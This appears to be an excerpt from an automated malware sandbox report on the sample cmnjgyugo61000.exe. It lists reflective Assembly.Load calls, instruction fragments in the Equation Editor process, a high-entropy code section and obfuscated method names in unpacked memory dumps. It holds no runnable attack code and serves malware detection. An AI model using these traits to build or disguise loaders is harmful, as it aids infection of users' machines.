                  Source: 5.2.cmnjgyugo61000.exe.3190770.4.raw.unpack, Uo.cs.Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
                  Source: 5.2.cmnjgyugo61000.exe.3bd2ae0.2.raw.unpack, gFGLQUQObC5qQ0lCjG.cs.Net Code: vUYaIWbHfr System.Reflection.Assembly.Load(byte[])
                  Source: 5.2.cmnjgyugo61000.exe.8510000.6.raw.unpack, gFGLQUQObC5qQ0lCjG.cs.Net Code: vUYaIWbHfr System.Reflection.Assembly.Load(byte[])
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00598F58 push eax; retf 2_2_00598F61
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005A5D52 push edx; ret 2_2_005A5D53
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005A7750 push edx; ret 2_2_005A7753
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005A7748 push edx; ret 2_2_005A774B
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005A7616 push edx; ret 2_2_005A7617
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005A6830 push ebx; ret 2_2_005A6833
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005A6B2E push edx; ret 2_2_005A6B2F
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005A5AFC push edx; ret 2_2_005A5AFF
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005901F4 push eax; retf 2_2_005901F5
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005A5DF4 push edx; ret 2_2_005A5E33
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0058F8EB push ss; ret 2_2_0058F8ED
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005A5D88 push edx; ret 2_2_005A5D9B
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005A578E push edx; ret 2_2_005A5AF7
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005A5DA0 push edx; ret 2_2_005A5DA3
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005A5DA4 push edx; ret 2_2_005A5E33
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_001D214D push ebx; iretd 8_2_001D21EA
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_001D217B push ebx; iretd 8_2_001D21EA
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_001D21AD push ebx; iretd 8_2_001D21EA
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_001D21FB push ebx; iretd 8_2_001D21EA
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeCode function: 8_2_003F90F8 pushfd ; retn 0035h8_2_003F90F9
                  Source: CLLPdgxhnmwGf5Y[1].exe.2.drStatic PE information: section name: .text entropy: 7.957335940199454
                  Source: cmnjgyugo61000.exe.2.drStatic PE information: section name: .text entropy: 7.957335940199454
                  Source: 5.2.cmnjgyugo61000.exe.3c57b00.3.raw.unpack, LclYXFogjBwfmAAPnV.csHigh entropy of concatenated method names: 'F1USxpNMBk', 'Jq9SO9y0AI', 't4JSvRXhgg', 'oBkSWif2HT', 'iHHSGwohj9', 'XJISZXHsFA', 'v4iSfxuTiy', 'sV1Snog1Rw', 'qXFS6YAKTm', 'r6NSHUj712'
                  Source: 5.2.cmnjgyugo61000.exe.3c57b00.3.raw.unpack, e75oKkqSCgScEZvAKm.csHigh entropy of concatenated method names: 'hxJJjLalPT', 'FByJB4yH7Y', 'vR3J9kkTvg', 'FNUJG2L1m7', 'yFZJfOhvoH', 'ENsJnMdcAZ', 'LwHJH4vFPv', 'u49Jd1AC2F', 'rtJJxf1Hrj', 'rBGJlRf0lj'
                  Source: 5.2.cmnjgyugo61000.exe.3c57b00.3.raw.unpack, dShs4ezPBMDHRwLLMU.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'WNV1JYp7NV', 'MME1SIuBh4', 'hSJ1gtTjBG', 'KHx1rTHnPQ', 'XyA1AiRD0B', 'Cp911Hd8tG', 'q4t1bD3wha'
                  Source: 5.2.cmnjgyugo61000.exe.3c57b00.3.raw.unpack, BJ2pW3uOeIoHjaHKoP.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'kkyKVVMycG', 'RJbKQwpAQK', 'rNgKzXogEW', 'kJkeXtGhCv', 'YaOe4P68UO', 'oSReKKikWd', 'yaAeeoi7g5', 'OjLDxh8QHv1PoSo30Wy'
                  Source: 5.2.cmnjgyugo61000.exe.3c57b00.3.raw.unpack, iiWnsRyLxDWh9ffbQG.csHigh entropy of concatenated method names: 'z8hfKWksO4174XoE8sb', 'sduBimkqWJRA6XIEp9P', 'w4FCAfnJQA', 'IRtC1073jI', 'b1UCb3FBgn', 'qMsIDGkRpvcCXPleWeA', 'uwsGkJk4ZyLlZrk9HjD'
                  Source: 5.2.cmnjgyugo61000.exe.3c57b00.3.raw.unpack, c28qukSTEIWu0Cb4yJ2.csHigh entropy of concatenated method names: 'BZG1UdQGTA', 'TAD1DmlK1J', 'ATX1IuMZnV', 'OlA1uhJUrh', 'tDu1MtCvk3', 'TQS1tlxBPu', 'aCZ1wFIENe', 'tko1jMeH3B', 'JQ61B70Ym6', 'CXp15ltPZx'
                  Source: 5.2.cmnjgyugo61000.exe.3c57b00.3.raw.unpack, q0jDvgXv2QdU043dgA.csHigh entropy of concatenated method names: 'QoVNMoiNsu', 'X2RNwuYw3H', 'l1F0ZMiLSZ', 'Igr0fk0f4l', 'GCm0nPhHlW', 'cGe06Nixsk', 'KuY0HxlcEe', 'C5r0ddYDV6', 'HdD0hjBh8L', 'M600xx7UEw'
                  Source: 5.2.cmnjgyugo61000.exe.3c57b00.3.raw.unpack, jnJIj2iDj4MGKBhUPO.csHigh entropy of concatenated method names: 'qbPcFlMHUe', 'iRdc0c2YWL', 'uIvcC9tL8A', 'JklCQmlGPa', 'CBMCzaZXev', 'IFBcXsTxUZ', 'WkWc41nwg3', 'bMbcK16Eno', 'vODce8b1FW', 'REocakpsGA'
                  Source: 5.2.cmnjgyugo61000.exe.3c57b00.3.raw.unpack, KQN7FiJmb5DebHwoE8.csHigh entropy of concatenated method names: 'y2k14Z0MHC', 'eVU1e0EsIj', 'Yv51aqwlAe', 'oHW1F2Gha7', 'og31YqxXW2', 'Mux1NXbvKJ', 'Ueh1CWNSRb', 'kUeAqbIZmD', 'sWaA8BpmNc', 'q1QAV89B81'
                  Source: 5.2.cmnjgyugo61000.exe.3c57b00.3.raw.unpack, vKe1BMSa6I25SnIIQFD.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lbEbvODlhh', 'BMnbWH07VF', 'cy6boxn43E', 'yfjbs6xUAR', 'EX4b70NDwN', 'ah2biYLMi2', 'S9Bbqh3eqi'
                  Source: 5.2.cmnjgyugo61000.exe.3c57b00.3.raw.unpack, yOXVwBPrFV5waJhhZk.csHigh entropy of concatenated method names: 'W6IcUrtJd4', 'jLIcDIqqlC', 'xAacIkvTaQ', 'Ps0cuqSHnK', 'RKLcMVI99n', 'btEcthLejQ', 'SoOcwtVC5i', 'FTxcjfKpYH', 'd26cBsOoUV', 'Yc3c5H98pY'
                  Source: 5.2.cmnjgyugo61000.exe.3c57b00.3.raw.unpack, BKdqCmVayTvkt8v6qJ.csHigh entropy of concatenated method names: 'Dispose', 'UQA4VWHPJU', 'BBbKGAgDsR', 'YiLEEBN755', 'Os04QiF3T9', 'l2m4zFWCkE', 'ProcessDialogKey', 'qWZKXwL9at', 'RwIK4B573C', 'zByKKeMcep'
                  Source: 5.2.cmnjgyugo61000.exe.3c57b00.3.raw.unpack, kPZwByDBcRi0ZY7Ors.csHigh entropy of concatenated method names: 'vAvCTD0w87', 'LjECUbwml7', 'aYSCIsmyQr', 'ua7Cuj4FVx', 'vQvCtZg9RE', 'gyeCwoUsip', 'BQtCBEjJCX', 'O81C5Q2bV8', 'NbOPTokMOJHeW5xHVJJ', 'oFiVxlkG8SwvnNbfwVS'
                  Source: 5.2.cmnjgyugo61000.exe.3c57b00.3.raw.unpack, BsieyFtZXxC0YkKZ1m.csHigh entropy of concatenated method names: 'a33ryE1GHD', 'VXPr2iRiR8', 'ToString', 'mX4rF0a1LX', 'CSgrYCKn6m', 'QPcr0Y5ffo', 'NKUrNZvCB3', 'BtNrCLRn3g', 'mxqrc7R6Re', 'VQsrPnRr90'
                  Source: 5.2.cmnjgyugo61000.exe.3c57b00.3.raw.unpack, W6lmCG9Nq4m7ubavG2.csHigh entropy of concatenated method names: 'fTyCmkEkhg', 'E8XCYrb04p', 'e2VCNeV3wT', 'kcYCc5Auhx', 'SGUCPgN2yL', 'T6ZN781iuH', 'hGPNi8gbsf', 'Rm7Nqg1QPA', 'fw5N8f1N4e', 'MtENVIUGma'
                  Source: 5.2.cmnjgyugo61000.exe.3c57b00.3.raw.unpack, e5cxfFeW2LybtdDGiN.csHigh entropy of concatenated method names: 'Wnr0u29UJq', 'dPF0td7v8v', 'GlK0j1jW4j', 'sJt0BB2Nup', 'y4L0SROAgF', 'MiT0gb1v6V', 'aGG0r1KZxe', 'ELU0AXCVDd', 'MaI01Tmi4F', 'mC80beGQRO'
                  Source: 5.2.cmnjgyugo61000.exe.3c57b00.3.raw.unpack, FpO6EurS5foft958ol.csHigh entropy of concatenated method names: 'EKyYvBmABP', 'KxtYWEjRWO', 'SlZYonVwpI', 'l9dYsNPKxr', 'lwJY7PujaT', 'Wk6YiBypLy', 'NM8YqrB9s4', 'pwVY81CPZc', 'yY8YVSPRtG', 'jetYQldbau'
                  Source: 5.2.cmnjgyugo61000.exe.3c57b00.3.raw.unpack, fmeKAfSSnKI2ClfROdS.csHigh entropy of concatenated method names: 'ToString', 'dL9bea7GXl', 'vkuba5KcRD', 'TbvbmRmO9E', 's5vbFp6nqP', 'wtfbY5An4h', 'V2jb0jV5Nm', 'tUVbNdSJlo', 'DSL4jdK3uMRfNS7Rphg', 'w2vnQOKdfogYxUpyxUB'
                  Source: 5.2.cmnjgyugo61000.exe.3c57b00.3.raw.unpack, zOLJmBCA1Teg7PiV1L.csHigh entropy of concatenated method names: 'NLnAFadnEg', 'SHCAYjqP9x', 'P8eA0M4mwA', 'ri8ANZyG1j', 'JUOACZTmeK', 'Ye6AcwdoTr', 'xTuAPXlbKb', 'pf5A3bfeVT', 'V0hAyemlds', 'q3oA2J1hj0'
                  Source: 5.2.cmnjgyugo61000.exe.3c57b00.3.raw.unpack, Xvr3YLNGwrNm4NZwvB.csHigh entropy of concatenated method names: 'UDQr8IS14h', 'SqorQSDk3E', 'JkUAXRyiNC', 'MxZA4OUEVm', 'XOkrlmYGdn', 'El8rORYZiY', 'zZwrLA8oTX', 'xKPrvvbgjm', 'nFJrW3Aw2s', 'HCuropyBI2'
                  Source: 5.2.cmnjgyugo61000.exe.3c57b00.3.raw.unpack, gFGLQUQObC5qQ0lCjG.csHigh entropy of concatenated method names: 'OvBemqwNU8', 'EoYeF4xmdo', 'uVReYFtpsC', 'WYPe0l4Jkg', 'wlleNxZbHk', 'sKxeC2RQiQ', 'o19ecKCXAa', 'igSePDPaDn', 'tbee3Dsww0', 'C9OeyJDbrf'
                  Source: 5.2.cmnjgyugo61000.exe.3c57b00.3.raw.unpack, AeDNYYHlu3VDqHZLHr.csHigh entropy of concatenated method names: 'WkiI3V4vJ', 'oBGuqejTZ', 'hhstBGGaT', 'Dd3wrQluM', 'QSsBVpXkL', 'f2r5x13Xl', 'RAYawt6wWaILic8Zur', 'RhQNS4WYJgUA7ognfS', 'IndAyxbvC', 'etSbJDeMJ'
                  Source: 5.2.cmnjgyugo61000.exe.3c57b00.3.raw.unpack, ibXryOsUOOV6l7fNKm.csHigh entropy of concatenated method names: 'kaN4cqGN2t', 'vFd4PBWreL', 'RwE4yUHCUB', 'ImC42hW0kt', 'qCV4SmB4VN', 'fdK4gaKuCc', 'uOD5p9CVIqLqY6AjMY', 'BDEuXcaNisbudQFChG', 'M7m44tBOuL', 'vuf4eZbtxd'
                  Source: 5.2.cmnjgyugo61000.exe.3bd2ae0.2.raw.unpack, LclYXFogjBwfmAAPnV.csHigh entropy of concatenated method names: 'F1USxpNMBk', 'Jq9SO9y0AI', 't4JSvRXhgg', 'oBkSWif2HT', 'iHHSGwohj9', 'XJISZXHsFA', 'v4iSfxuTiy', 'sV1Snog1Rw', 'qXFS6YAKTm', 'r6NSHUj712'
                  Source: 5.2.cmnjgyugo61000.exe.3bd2ae0.2.raw.unpack, e75oKkqSCgScEZvAKm.csHigh entropy of concatenated method names: 'hxJJjLalPT', 'FByJB4yH7Y', 'vR3J9kkTvg', 'FNUJG2L1m7', 'yFZJfOhvoH', 'ENsJnMdcAZ', 'LwHJH4vFPv', 'u49Jd1AC2F', 'rtJJxf1Hrj', 'rBGJlRf0lj'
                  Source: 5.2.cmnjgyugo61000.exe.3bd2ae0.2.raw.unpack, dShs4ezPBMDHRwLLMU.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'WNV1JYp7NV', 'MME1SIuBh4', 'hSJ1gtTjBG', 'KHx1rTHnPQ', 'XyA1AiRD0B', 'Cp911Hd8tG', 'q4t1bD3wha'
                  Source: 5.2.cmnjgyugo61000.exe.3bd2ae0.2.raw.unpack, BJ2pW3uOeIoHjaHKoP.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'kkyKVVMycG', 'RJbKQwpAQK', 'rNgKzXogEW', 'kJkeXtGhCv', 'YaOe4P68UO', 'oSReKKikWd', 'yaAeeoi7g5', 'OjLDxh8QHv1PoSo30Wy'
                  Source: 5.2.cmnjgyugo61000.exe.3bd2ae0.2.raw.unpack, iiWnsRyLxDWh9ffbQG.csHigh entropy of concatenated method names: 'z8hfKWksO4174XoE8sb', 'sduBimkqWJRA6XIEp9P', 'w4FCAfnJQA', 'IRtC1073jI', 'b1UCb3FBgn', 'qMsIDGkRpvcCXPleWeA', 'uwsGkJk4ZyLlZrk9HjD'
                  Source: 5.2.cmnjgyugo61000.exe.3bd2ae0.2.raw.unpack, c28qukSTEIWu0Cb4yJ2.csHigh entropy of concatenated method names: 'BZG1UdQGTA', 'TAD1DmlK1J', 'ATX1IuMZnV', 'OlA1uhJUrh', 'tDu1MtCvk3', 'TQS1tlxBPu', 'aCZ1wFIENe', 'tko1jMeH3B', 'JQ61B70Ym6', 'CXp15ltPZx'
                  Source: 5.2.cmnjgyugo61000.exe.3bd2ae0.2.raw.unpack, q0jDvgXv2QdU043dgA.csHigh entropy of concatenated method names: 'QoVNMoiNsu', 'X2RNwuYw3H', 'l1F0ZMiLSZ', 'Igr0fk0f4l', 'GCm0nPhHlW', 'cGe06Nixsk', 'KuY0HxlcEe', 'C5r0ddYDV6', 'HdD0hjBh8L', 'M600xx7UEw'
                  Source: 5.2.cmnjgyugo61000.exe.3bd2ae0.2.raw.unpack, jnJIj2iDj4MGKBhUPO.csHigh entropy of concatenated method names: 'qbPcFlMHUe', 'iRdc0c2YWL', 'uIvcC9tL8A', 'JklCQmlGPa', 'CBMCzaZXev', 'IFBcXsTxUZ', 'WkWc41nwg3', 'bMbcK16Eno', 'vODce8b1FW', 'REocakpsGA'
                  Source: 5.2.cmnjgyugo61000.exe.3bd2ae0.2.raw.unpack, KQN7FiJmb5DebHwoE8.csHigh entropy of concatenated method names: 'y2k14Z0MHC', 'eVU1e0EsIj', 'Yv51aqwlAe', 'oHW1F2Gha7', 'og31YqxXW2', 'Mux1NXbvKJ', 'Ueh1CWNSRb', 'kUeAqbIZmD', 'sWaA8BpmNc', 'q1QAV89B81'
                  Source: 5.2.cmnjgyugo61000.exe.3bd2ae0.2.raw.unpack, vKe1BMSa6I25SnIIQFD.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lbEbvODlhh', 'BMnbWH07VF', 'cy6boxn43E', 'yfjbs6xUAR', 'EX4b70NDwN', 'ah2biYLMi2', 'S9Bbqh3eqi'
                  Source: 5.2.cmnjgyugo61000.exe.3bd2ae0.2.raw.unpack, yOXVwBPrFV5waJhhZk.csHigh entropy of concatenated method names: 'W6IcUrtJd4', 'jLIcDIqqlC', 'xAacIkvTaQ', 'Ps0cuqSHnK', 'RKLcMVI99n', 'btEcthLejQ', 'SoOcwtVC5i', 'FTxcjfKpYH', 'd26cBsOoUV', 'Yc3c5H98pY'
                  Source: 5.2.cmnjgyugo61000.exe.3bd2ae0.2.raw.unpack, BKdqCmVayTvkt8v6qJ.csHigh entropy of concatenated method names: 'Dispose', 'UQA4VWHPJU', 'BBbKGAgDsR', 'YiLEEBN755', 'Os04QiF3T9', 'l2m4zFWCkE', 'ProcessDialogKey', 'qWZKXwL9at', 'RwIK4B573C', 'zByKKeMcep'
                  Source: 5.2.cmnjgyugo61000.exe.3bd2ae0.2.raw.unpack, kPZwByDBcRi0ZY7Ors.csHigh entropy of concatenated method names: 'vAvCTD0w87', 'LjECUbwml7', 'aYSCIsmyQr', 'ua7Cuj4FVx', 'vQvCtZg9RE', 'gyeCwoUsip', 'BQtCBEjJCX', 'O81C5Q2bV8', 'NbOPTokMOJHeW5xHVJJ', 'oFiVxlkG8SwvnNbfwVS'
                  Source: 5.2.cmnjgyugo61000.exe.3bd2ae0.2.raw.unpack, BsieyFtZXxC0YkKZ1m.csHigh entropy of concatenated method names: 'a33ryE1GHD', 'VXPr2iRiR8', 'ToString', 'mX4rF0a1LX', 'CSgrYCKn6m', 'QPcr0Y5ffo', 'NKUrNZvCB3', 'BtNrCLRn3g', 'mxqrc7R6Re', 'VQsrPnRr90'
                  Source: 5.2.cmnjgyugo61000.exe.3bd2ae0.2.raw.unpack, W6lmCG9Nq4m7ubavG2.csHigh entropy of concatenated method names: 'fTyCmkEkhg', 'E8XCYrb04p', 'e2VCNeV3wT', 'kcYCc5Auhx', 'SGUCPgN2yL', 'T6ZN781iuH', 'hGPNi8gbsf', 'Rm7Nqg1QPA', 'fw5N8f1N4e', 'MtENVIUGma'
                  Source: 5.2.cmnjgyugo61000.exe.3bd2ae0.2.raw.unpack, e5cxfFeW2LybtdDGiN.csHigh entropy of concatenated method names: 'Wnr0u29UJq', 'dPF0td7v8v', 'GlK0j1jW4j', 'sJt0BB2Nup', 'y4L0SROAgF', 'MiT0gb1v6V', 'aGG0r1KZxe', 'ELU0AXCVDd', 'MaI01Tmi4F', 'mC80beGQRO'
                  Source: 5.2.cmnjgyugo61000.exe.3bd2ae0.2.raw.unpack, FpO6EurS5foft958ol.csHigh entropy of concatenated method names: 'EKyYvBmABP', 'KxtYWEjRWO', 'SlZYonVwpI', 'l9dYsNPKxr', 'lwJY7PujaT', 'Wk6YiBypLy', 'NM8YqrB9s4', 'pwVY81CPZc', 'yY8YVSPRtG', 'jetYQldbau'
                  Source: 5.2.cmnjgyugo61000.exe.3bd2ae0.2.raw.unpack, fmeKAfSSnKI2ClfROdS.csHigh entropy of concatenated method names: 'ToString', 'dL9bea7GXl', 'vkuba5KcRD', 'TbvbmRmO9E', 's5vbFp6nqP', 'wtfbY5An4h', 'V2jb0jV5Nm', 'tUVbNdSJlo', 'DSL4jdK3uMRfNS7Rphg', 'w2vnQOKdfogYxUpyxUB'
                  Source: 5.2.cmnjgyugo61000.exe.3bd2ae0.2.raw.unpack, zOLJmBCA1Teg7PiV1L.csHigh entropy of concatenated method names: 'NLnAFadnEg', 'SHCAYjqP9x', 'P8eA0M4mwA', 'ri8ANZyG1j', 'JUOACZTmeK', 'Ye6AcwdoTr', 'xTuAPXlbKb', 'pf5A3bfeVT', 'V0hAyemlds', 'q3oA2J1hj0'
                  Source: 5.2.cmnjgyugo61000.exe.3bd2ae0.2.raw.unpack, Xvr3YLNGwrNm4NZwvB.csHigh entropy of concatenated method names: 'UDQr8IS14h', 'SqorQSDk3E', 'JkUAXRyiNC', 'MxZA4OUEVm', 'XOkrlmYGdn', 'El8rORYZiY', 'zZwrLA8oTX', 'xKPrvvbgjm', 'nFJrW3Aw2s', 'HCuropyBI2'
                  Source: 5.2.cmnjgyugo61000.exe.3bd2ae0.2.raw.unpack, gFGLQUQObC5qQ0lCjG.csHigh entropy of concatenated method names: 'OvBemqwNU8', 'EoYeF4xmdo', 'uVReYFtpsC', 'WYPe0l4Jkg', 'wlleNxZbHk', 'sKxeC2RQiQ', 'o19ecKCXAa', 'igSePDPaDn', 'tbee3Dsww0', 'C9OeyJDbrf'
                  Source: 5.2.cmnjgyugo61000.exe.3bd2ae0.2.raw.unpack, AeDNYYHlu3VDqHZLHr.csHigh entropy of concatenated method names: 'WkiI3V4vJ', 'oBGuqejTZ', 'hhstBGGaT', 'Dd3wrQluM', 'QSsBVpXkL', 'f2r5x13Xl', 'RAYawt6wWaILic8Zur', 'RhQNS4WYJgUA7ognfS', 'IndAyxbvC', 'etSbJDeMJ'
                  Source: 5.2.cmnjgyugo61000.exe.3bd2ae0.2.raw.unpack, ibXryOsUOOV6l7fNKm.csHigh entropy of concatenated method names: 'kaN4cqGN2t', 'vFd4PBWreL', 'RwE4yUHCUB', 'ImC42hW0kt', 'qCV4SmB4VN', 'fdK4gaKuCc', 'uOD5p9CVIqLqY6AjMY', 'BDEuXcaNisbudQFChG', 'M7m44tBOuL', 'vuf4eZbtxd'
                  Source: 5.2.cmnjgyugo61000.exe.8510000.6.raw.unpack, LclYXFogjBwfmAAPnV.csHigh entropy of concatenated method names: 'F1USxpNMBk', 'Jq9SO9y0AI', 't4JSvRXhgg', 'oBkSWif2HT', 'iHHSGwohj9', 'XJISZXHsFA', 'v4iSfxuTiy', 'sV1Snog1Rw', 'qXFS6YAKTm', 'r6NSHUj712'
                  Source: 5.2.cmnjgyugo61000.exe.8510000.6.raw.unpack, e75oKkqSCgScEZvAKm.csHigh entropy of concatenated method names: 'hxJJjLalPT', 'FByJB4yH7Y', 'vR3J9kkTvg', 'FNUJG2L1m7', 'yFZJfOhvoH', 'ENsJnMdcAZ', 'LwHJH4vFPv', 'u49Jd1AC2F', 'rtJJxf1Hrj', 'rBGJlRf0lj'
                  Source: 5.2.cmnjgyugo61000.exe.8510000.6.raw.unpack, dShs4ezPBMDHRwLLMU.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'WNV1JYp7NV', 'MME1SIuBh4', 'hSJ1gtTjBG', 'KHx1rTHnPQ', 'XyA1AiRD0B', 'Cp911Hd8tG', 'q4t1bD3wha'
                  Source: 5.2.cmnjgyugo61000.exe.8510000.6.raw.unpack, BJ2pW3uOeIoHjaHKoP.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'kkyKVVMycG', 'RJbKQwpAQK', 'rNgKzXogEW', 'kJkeXtGhCv', 'YaOe4P68UO', 'oSReKKikWd', 'yaAeeoi7g5', 'OjLDxh8QHv1PoSo30Wy'
                  Source: 5.2.cmnjgyugo61000.exe.8510000.6.raw.unpack, iiWnsRyLxDWh9ffbQG.csHigh entropy of concatenated method names: 'z8hfKWksO4174XoE8sb', 'sduBimkqWJRA6XIEp9P', 'w4FCAfnJQA', 'IRtC1073jI', 'b1UCb3FBgn', 'qMsIDGkRpvcCXPleWeA', 'uwsGkJk4ZyLlZrk9HjD'
                  Source: 5.2.cmnjgyugo61000.exe.8510000.6.raw.unpack, c28qukSTEIWu0Cb4yJ2.csHigh entropy of concatenated method names: 'BZG1UdQGTA', 'TAD1DmlK1J', 'ATX1IuMZnV', 'OlA1uhJUrh', 'tDu1MtCvk3', 'TQS1tlxBPu', 'aCZ1wFIENe', 'tko1jMeH3B', 'JQ61B70Ym6', 'CXp15ltPZx'
                  Source: 5.2.cmnjgyugo61000.exe.8510000.6.raw.unpack, q0jDvgXv2QdU043dgA.csHigh entropy of concatenated method names: 'QoVNMoiNsu', 'X2RNwuYw3H', 'l1F0ZMiLSZ', 'Igr0fk0f4l', 'GCm0nPhHlW', 'cGe06Nixsk', 'KuY0HxlcEe', 'C5r0ddYDV6', 'HdD0hjBh8L', 'M600xx7UEw'
                  Source: 5.2.cmnjgyugo61000.exe.8510000.6.raw.unpack, jnJIj2iDj4MGKBhUPO.csHigh entropy of concatenated method names: 'qbPcFlMHUe', 'iRdc0c2YWL', 'uIvcC9tL8A', 'JklCQmlGPa', 'CBMCzaZXev', 'IFBcXsTxUZ', 'WkWc41nwg3', 'bMbcK16Eno', 'vODce8b1FW', 'REocakpsGA'
                  Source: 5.2.cmnjgyugo61000.exe.8510000.6.raw.unpack, KQN7FiJmb5DebHwoE8.csHigh entropy of concatenated method names: 'y2k14Z0MHC', 'eVU1e0EsIj', 'Yv51aqwlAe', 'oHW1F2Gha7', 'og31YqxXW2', 'Mux1NXbvKJ', 'Ueh1CWNSRb', 'kUeAqbIZmD', 'sWaA8BpmNc', 'q1QAV89B81'
                  Source: 5.2.cmnjgyugo61000.exe.8510000.6.raw.unpack, vKe1BMSa6I25SnIIQFD.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lbEbvODlhh', 'BMnbWH07VF', 'cy6boxn43E', 'yfjbs6xUAR', 'EX4b70NDwN', 'ah2biYLMi2', 'S9Bbqh3eqi'
                  Source: 5.2.cmnjgyugo61000.exe.8510000.6.raw.unpack, yOXVwBPrFV5waJhhZk.csHigh entropy of concatenated method names: 'W6IcUrtJd4', 'jLIcDIqqlC', 'xAacIkvTaQ', 'Ps0cuqSHnK', 'RKLcMVI99n', 'btEcthLejQ', 'SoOcwtVC5i', 'FTxcjfKpYH', 'd26cBsOoUV', 'Yc3c5H98pY'
                  Source: 5.2.cmnjgyugo61000.exe.8510000.6.raw.unpack, BKdqCmVayTvkt8v6qJ.csHigh entropy of concatenated method names: 'Dispose', 'UQA4VWHPJU', 'BBbKGAgDsR', 'YiLEEBN755', 'Os04QiF3T9', 'l2m4zFWCkE', 'ProcessDialogKey', 'qWZKXwL9at', 'RwIK4B573C', 'zByKKeMcep'
                  Source: 5.2.cmnjgyugo61000.exe.8510000.6.raw.unpack, kPZwByDBcRi0ZY7Ors.csHigh entropy of concatenated method names: 'vAvCTD0w87', 'LjECUbwml7', 'aYSCIsmyQr', 'ua7Cuj4FVx', 'vQvCtZg9RE', 'gyeCwoUsip', 'BQtCBEjJCX', 'O81C5Q2bV8', 'NbOPTokMOJHeW5xHVJJ', 'oFiVxlkG8SwvnNbfwVS'
                  Source: 5.2.cmnjgyugo61000.exe.8510000.6.raw.unpack, BsieyFtZXxC0YkKZ1m.csHigh entropy of concatenated method names: 'a33ryE1GHD', 'VXPr2iRiR8', 'ToString', 'mX4rF0a1LX', 'CSgrYCKn6m', 'QPcr0Y5ffo', 'NKUrNZvCB3', 'BtNrCLRn3g', 'mxqrc7R6Re', 'VQsrPnRr90'
                  Source: 5.2.cmnjgyugo61000.exe.8510000.6.raw.unpack, W6lmCG9Nq4m7ubavG2.csHigh entropy of concatenated method names: 'fTyCmkEkhg', 'E8XCYrb04p', 'e2VCNeV3wT', 'kcYCc5Auhx', 'SGUCPgN2yL', 'T6ZN781iuH', 'hGPNi8gbsf', 'Rm7Nqg1QPA', 'fw5N8f1N4e', 'MtENVIUGma'
                  Source: 5.2.cmnjgyugo61000.exe.8510000.6.raw.unpack, e5cxfFeW2LybtdDGiN.csHigh entropy of concatenated method names: 'Wnr0u29UJq', 'dPF0td7v8v', 'GlK0j1jW4j', 'sJt0BB2Nup', 'y4L0SROAgF', 'MiT0gb1v6V', 'aGG0r1KZxe', 'ELU0AXCVDd', 'MaI01Tmi4F', 'mC80beGQRO'
                  Source: 5.2.cmnjgyugo61000.exe.8510000.6.raw.unpack, FpO6EurS5foft958ol.csHigh entropy of concatenated method names: 'EKyYvBmABP', 'KxtYWEjRWO', 'SlZYonVwpI', 'l9dYsNPKxr', 'lwJY7PujaT', 'Wk6YiBypLy', 'NM8YqrB9s4', 'pwVY81CPZc', 'yY8YVSPRtG', 'jetYQldbau'
                  Source: 5.2.cmnjgyugo61000.exe.8510000.6.raw.unpack, fmeKAfSSnKI2ClfROdS.csHigh entropy of concatenated method names: 'ToString', 'dL9bea7GXl', 'vkuba5KcRD', 'TbvbmRmO9E', 's5vbFp6nqP', 'wtfbY5An4h', 'V2jb0jV5Nm', 'tUVbNdSJlo', 'DSL4jdK3uMRfNS7Rphg', 'w2vnQOKdfogYxUpyxUB'
                  Source: 5.2.cmnjgyugo61000.exe.8510000.6.raw.unpack, zOLJmBCA1Teg7PiV1L.csHigh entropy of concatenated method names: 'NLnAFadnEg', 'SHCAYjqP9x', 'P8eA0M4mwA', 'ri8ANZyG1j', 'JUOACZTmeK', 'Ye6AcwdoTr', 'xTuAPXlbKb', 'pf5A3bfeVT', 'V0hAyemlds', 'q3oA2J1hj0'
